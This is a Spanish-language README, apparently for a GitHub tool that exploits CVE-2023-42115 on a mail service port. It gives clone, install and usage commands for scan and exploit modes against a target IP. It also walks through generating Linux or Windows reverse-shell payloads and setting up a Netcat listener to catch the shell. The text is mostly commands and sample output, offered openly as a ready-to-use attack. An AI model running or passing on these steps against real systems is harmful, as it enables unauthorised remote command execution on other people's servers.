
Generador de exploits y payloads de reverse shell basado en Python para CVE-2023-42115, con modos de escaneo y explotación, además de creación de payloads multiplataforma.
Este repositorio contiene dos scripts de Python:
exploit.py: Un script para explotar CVE-2023-42115.generate_payload.py: Un script para generar payloads de reverse shell.Antes de ejecutar los scripts, asegúrate de tener Python 3 instalado en tu sistema.
git clone https://github.com/isotaka134/cve-2023-42115.git
cd cve-2023-42115
Instala las bibliotecas de Python necesarias usando pip. Ejecuta el siguiente comando para instalar todas las dependencias necesarias listadas en requirements.txt:
pip install -r requirements.txt
exploit.py
Este script explota la vulnerabilidad CVE-2023-42115.
python exploit.py -t <target_ip> -p <target_port> [options]
Opciones:
-t: La dirección IP del objetivo.
-p: El puerto del servicio objetivo.
Ejemplo:
python exploit.py -t 192.168.1.10 -p 25 --mode SCAN
python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
generate_payload.py
Este script genera un payload de reverse shell basado en la entrada del usuario.
python generate_payload.py
Pasos:
El script te solicitará la siguiente información:
A. Tipo de payload (linux o windows)
B. IP local: dirección para la conexión inversa
C. Puerto local: para la conexión inversa ** I: Si estás detrás de un router o usas NAT, asegúrate de configurar la redirección de puertos correcta hacia tu dispositivo que ejecuta Netcat.**
D. Nombre del archivo de salida (por ejemplo, payload.sh para Linux o payload.ps1 para Windows)
Ejemplo:
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh
Debes configurar un listener en tu máquina local para capturar la reverse shell. Puedes usar Netcat (nc) para esto.
nc -lvnp <YOUR_LOCAL_PORT>
nc -lvnp <YOUR_LOCAL_PORT>
Siguiendo estos pasos, deberías poder crear y usar un payload para explotar CVE-2023-42115 y recibir una conexión de reverse shell.
Si tienes sugerencias de mejoras o quieres contribuir, abre un issue o envía un pull request.
Para preguntas o soporte, contacta con